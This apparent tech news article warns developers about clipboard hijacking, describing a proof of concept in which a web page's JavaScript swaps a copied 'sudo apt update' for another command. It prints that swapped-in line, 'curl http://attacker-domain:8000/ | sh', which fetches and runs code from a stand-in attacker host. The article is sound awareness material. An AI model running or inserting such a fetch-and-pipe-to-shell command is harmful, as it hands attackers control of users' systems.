Do not copy and paste commands from web pages – you can be hacked


Programmers, system administrators, security researchers, and tech enthusiasts who copy and paste web page commands into a console or terminal are warned that their system could be compromised.

A technologist shows a simple trick that will make you think twice before copying and pasting text from web pages.

Backdoor on your clipboard?

Recently, Gabriel Friedlander, founder of the security awareness training platform Wizer, demonstrated an obvious but surprising hack that will prevent you from copying and pasting commands from web pages.

It is not uncommon for new and experienced developers to copy commonly used commands from a web page (ahem, StackOverflow) and paste them into their applications, a Windows command prompt, or a Linux terminal.

But Friedlander warns that a webpage could secretly replace the contents of what’s on your clipboard, and what ends up copying to your clipboard would be very different from what you intended to copy.

Worse yet, without the necessary due diligence, the developer may only realize their mistake after pasting the text, in which case it may be too late.

In a simple proof of concept (PoC) posted to his blog, Friedlander asks readers to copy a simple command that most system administrators and developers are familiar with:

PoC command to copy and paste
Friedlander’s HTML page with a simple command that you can copy to the clipboard

Now paste what you copied from Friedlander’s blog into a text box or notepad, and the result might surprise you:

curl http: // attacker-domain: 8000 / | sh

Not only do you get a completely different command present on your clipboard, but to make matters worse, it has a newline (or return) character at the end.

This means that the example above would run as soon as it was pasted directly into a Linux terminal.

Those pasting the text might have felt like they were copying the familiar and harmless command sudo apt update which is used to retrieve updated information about the software installed on your system.

But that’s not quite what happened.

What is causing this?

The magic lies in the JavaScript code hidden behind Friedlander’s HTML PoC page setup.

As soon as you copy the “sudo apt update ” text contained in an HTML element, the code snippet, shown below, executes.

What happens next is JavaScript ‘event listener‘by capturing the copy event and replacing the data in the clipboard with Friedlander’s malicious test code:

PoC JavaScript code
PoC JavaScript code that replaces the contents of the clipboard

Note that event listeners have a variety of legitimate use cases in JavaScript, but this is just one example of how they could be misused.

“That’s why you should NEVER copy paste commands directly into your terminal,” Friedlander warns.

“You think you’re copying something, but it’s replaced with something else, like malicious code. It only takes a single line of code injected into the code you copied to create a backdoor to your application. “

“This attack is very simple but also very harmful.”

A simple but nonetheless important lesson in everyday safety.


Please enter your comment!
Please enter your name here

Trending this Week